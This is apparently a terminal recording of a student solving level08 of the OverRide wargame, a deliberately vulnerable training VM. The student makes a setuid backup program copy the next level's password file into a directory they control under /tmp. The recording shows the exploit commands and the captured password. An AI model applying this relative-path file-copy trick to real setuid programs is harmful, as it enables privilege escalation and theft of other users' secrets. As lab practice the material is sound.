{"version": 2, "width": 80, "height": 24, "timestamp": 1755841351, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.028696, "o", "Restored session: Fri Aug 22 07:42:27 CEST 2025\r\n"]
[0.304606, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                               \r \r"]
[0.305085, "o", "\u001b]7;file://MacBook-Pro-de-Edouard.local/Users/edouard/Desktop/42-School/GitHub/OverRide\u0007"]
[0.3061, "o", "\u001b]2;edouard@MacBook-Pro-de-Edouard\u0007\u001b]1;..tHub/OverRide\u0007"]
[0.308283, "o", "\u001b]7;file://MacBook-Pro-de-Edouard.local/Users/edouard/Desktop/42-School/GitHub/OverRide\u001b\\"]
[0.30903, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mOverRide\u001b[00m \u001b[K"]
[0.309113, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.384914, "o", "\r\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mOverRide\u001b[00m \u001b[01;34mgit:(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[1.418063, "o", "s"]
[1.598664, "o", "\bss"]
[1.710151, "o", "h"]
[2.499675, "o", " level08@192.168.1.189 -p 4242"]
[3.330382, "o", "\u001b[?1l\u001b>"]
[3.330475, "o", "\u001b[?2004l\r\r\n"]
[3.332658, "o", "\u001b]2;ssh level08@192.168.1.189 -p 4242\u0007\u001b]1;level08@192.168.1.189\u0007"]
[3.44808, "o", "\t   ____                  ____  _     __   \r\n\t  / __ \\_   _____  _____/ __ \\(_)___/ /__ \r\n\t / / / / | / / _ \\/ ___/ /_/ / / __  / _ \\\r\n\t/ /_/ /| |/ /  __/ /  / _, _/ / /_/ /  __/\r\n\t\\____/ |___/\\___/_/  /_/ |_/_/\\__,_/\\___/ \r\n                                          \r\n                       Good luck & Have fun\r\n\r\n   To start, ssh with level00/level00 on 192.168.1.189:4242\r\n"]
[3.459798, "o", "\r"]
[3.460185, "o", "level08@192.168.1.189's password: "]
[4.311801, "o", "\r\n"]
[4.513686, "o", "\r\n"]
[6.895555, "o", "Permission denied, please try again.\r\r\n\r"]
[6.895687, "o", "level08@192.168.1.189's password: "]
[15.31613, "o", "\r\n"]
[15.35065, "o", "\r\n"]
[15.394623, "o", "RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE\r\n"]
[15.396475, "o", "\u001b[32mFull RELRO   \u001b[m   "]
[15.397223, "o", "\u001b[32mCanary found   \u001b[m   "]
[15.398559, "o", "\u001b[31mNX disabled\u001b[m   "]
[15.399851, "o", "\u001b[31mNo PIE       \u001b[m   "]
[15.402354, "o", "\u001b[32mNo RPATH \u001b[m  "]
[15.40297, "o", "\u001b[32mNo RUNPATH \u001b[m  "]
[15.40408, "o", "\u001b[37;41m/home/users/level08/level08\u001b[m\r\n\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[16.203927, "o", "c"]
[16.295843, "o", "l"]
[16.433768, "o", "e"]
[16.613902, "o", "a"]
[16.791986, "o", "r"]
[16.852272, "o", "\r\n"]
[16.854192, "o", "\u001b[H\u001b[2J"]
[16.855284, "o", "\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[17.674708, "o", "l"]
[17.761801, "o", "s"]
[17.851542, "o", "\r\n"]
[17.854697, "o", "\u001b[0m\u001b[01;34mbackups\u001b[0m  \u001b[37;41mlevel08\u001b[0m\r\n"]
[17.855687, "o", "\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[18.437621, "o", "."]
[18.507497, "o", "/"]
[18.631883, "o", "\u0007"]
[19.262253, "o", "l"]
[19.327886, "o", "e"]
[19.482652, "o", "vel08 "]
[19.797309, "o", "\r\nUsage: ./level08 filename\r\nERROR: Failed to open (null)\r\n\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[23.457342, "o", "./level08 "]
[25.00818, "o", "/"]
[29.448218, "o", "h"]
[29.673603, "o", "o"]
[29.854963, "o", "m"]
[29.940515, "o", "e"]
[30.666386, "o", "/"]
[31.591217, "o", "u"]
[31.724516, "o", "s"]
[31.977672, "o", "e"]
[32.110568, "o", "r"]
[32.397295, "o", "s"]
[33.076146, "o", "/"]
[35.213546, "o", "l"]
[35.327932, "o", "e"]
[35.552015, "o", "v"]
[35.710586, "o", "e"]
[35.817531, "o", "l"]
[40.27098, "o", "0"]
[40.383337, "o", "9"]
[41.332149, "o", "/"]
[41.844571, "o", "."]
[42.291767, "o", "p"]
[43.375753, "o", "a"]
[43.485419, "o", "s"]
[43.769465, "o", "s"]
[45.923619, "o", "\r\n"]
[45.92644, "o", "ERROR: Failed to open ./backups//home/users/level09/.pass\r\n\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[54.075153, "o", "c"]
[54.199621, "o", "l"]
[54.318659, "o", "e"]
[54.545445, "o", "a"]
[54.747027, "o", "r"]
[54.849298, "o", "\r\n"]
[54.851094, "o", "\u001b[H\u001b[2J\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[56.009575, "o", "l"]
[56.360778, "o", "s"]
[56.449136, "o", "\r\n"]
[56.450755, "o", "\u001b[0m\u001b[01;34mbackups\u001b[0m  \u001b[37;41mlevel08\u001b[0m"]
[56.452701, "o", "\r\n\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[56.917462, "o", "c"]
[57.067371, "o", "l"]
[57.182177, "o", "e"]
[57.360133, "o", "a"]
[58.142922, "o", "\b\u001b[K"]
[58.310104, "o", "\b\u001b[K"]
[58.460389, "o", "\b\u001b[K"]
[58.620257, "o", "\b\u001b[K"]
[58.77989, "o", "\u0007"]
[58.981415, "o", "\u0007"]
[59.524048, "o", "l"]
[59.588454, "o", "s"]
[59.633773, "o", " "]
[60.285244, "o", "/"]
[60.735616, "o", "b"]
[60.785883, "o", "a"]
[60.996151, "o", "\u0007"]
[63.13707, "o", "c"]
[63.716879, "o", "k"]
[65.832779, "o", "u"]
[66.319712, "o", "p"]
[66.679268, "o", "s"]
[66.826495, "o", "\r\n"]
[66.830033, "o", "ls: cannot access /backups: No such file or directory\r\n\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[67.850224, "o", "c"]
[68.064329, "o", "l"]
[68.132699, "o", "e"]
[68.379578, "o", "a"]
[68.595738, "o", "r"]
[68.644022, "o", "\r\n\u001b[H\u001b[2J\u001b]0;level08@OverRide: ~\u0007level08@OverRide:~$ "]
[83.117344, "o", "c"]
[83.225994, "o", "d"]
[83.322459, "o", " "]
[84.077465, "o", "/"]
[84.776861, "o", "t"]
[84.838543, "o", "m"]
[85.029097, "o", "p"]
[85.212844, "o", "\r\n\u001b]0;level08@OverRide: /tmp\u0007level08@OverRide:/tmp$ "]
[89.535776, "o", "mkdir -p ./backups/home/users/level09/"]
[92.632552, "o", "\r\n"]
[92.634384, "o", "\u001b]0;level08@OverRide: /tmp\u0007level08@OverRide:/tmp$ "]
[99.602456, "o", "~/level08 /home/users/level09/.pass"]
[100.805132, "o", "\r\n\u001b]0;level08@OverRide: /tmp\u0007level08@OverRide:/tmp$ "]
[105.884313, "o", "cat ./backups/home/users/level09/.pass"]
[106.385376, "o", "\r\n"]
[106.386826, "o", "fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S\r\n"]
[106.388177, "o", "\u001b]0;level08@OverRide: /tmp\u0007level08@OverRide:/tmp$ "]
[107.858338, "o", "d"]
[107.94427, "o", "o"]
[108.14922, "o", "n"]
[108.194068, "o", "e"]
[109.339622, "o", "."]
[109.475817, "o", "."]
[109.635694, "o", "."]
[109.74788, "o", "."]
[110.739779, "o", "\r\n"]
[110.794252, "o", "Sorry, command-not-found has crashed! Please file a bug report at:\r\nhttps://bugs.launchpad.net/command-not-found/+filebug\r\nPlease include the following information with the report:\r\n\r\ncommand-not-found version: 0.2.44\r\n"]
[110.811737, "o", "\u001b]0;level08@OverRide: /tmp\u0007level08@OverRide:/tmp$ "]
[112.61165, "o", "logout\r\n"]
[112.615219, "o", "Connection to 192.168.1.189 closed.\r\r\n"]
[112.619537, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                               \r \r"]
[112.620573, "o", "\u001b]7;file://MacBook-Pro-de-Edouard.local/Users/edouard/Desktop/42-School/GitHub/OverRide\u0007"]
[112.622874, "o", "\u001b]2;edouard@MacBook-Pro-de-Edouard\u0007\u001b]1;..tHub/OverRide\u0007"]
[112.627959, "o", "\u001b]7;file://MacBook-Pro-de-Edouard.local/Users/edouard/Desktop/42-School/GitHub/OverRide\u001b\\"]
[112.63013, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mOverRide\u001b[00m \u001b[01;34mgit:(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[112.63031, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[113.346821, "o", "\u001b[?2004l\r\r\n"]
[113.360477, "o", "\r\nSaving session..."]
[113.369566, "o", "completed.\r\n"]
